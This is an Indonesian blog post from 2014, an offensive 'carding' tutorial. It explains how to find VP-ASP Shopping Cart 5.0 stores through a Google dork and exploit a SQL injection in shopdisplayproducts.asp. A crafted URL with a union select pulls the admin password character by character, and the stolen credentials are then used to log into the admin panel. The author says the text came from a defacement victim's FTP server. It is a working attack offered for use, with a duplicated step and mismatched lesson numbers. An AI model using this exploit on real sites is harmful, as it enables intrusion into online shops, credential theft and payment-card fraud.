Home » Hacker » Kriptografi » Tips N Triks » Tutorial Carding (Bagian IV)

Jumat, 06 Juni 2014

Tutorial Carding (Bagian IV)


--------------------------------------
Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman Cerita Hari iNi.
--------------------------------------
 
'`%%`%%`%%,`%%'`% Materi ke-12 : VP-ASP Shopping Cart 5.0 Cara II`%%`%%`%%,`%%'`% '
!NB : SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
2. Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
3. Ganti²lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
4. Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
5. Untuk login admin ke http://.../vpasp/shopadmin.asp
6. Demikanlah, Materi ke-4 Selesai.
/* ------------------------------|EOF|------------------------------ */

Posted in: ,,
Posting Lebih Baru Posting Lama Beranda

0 komentar:

Posting Komentar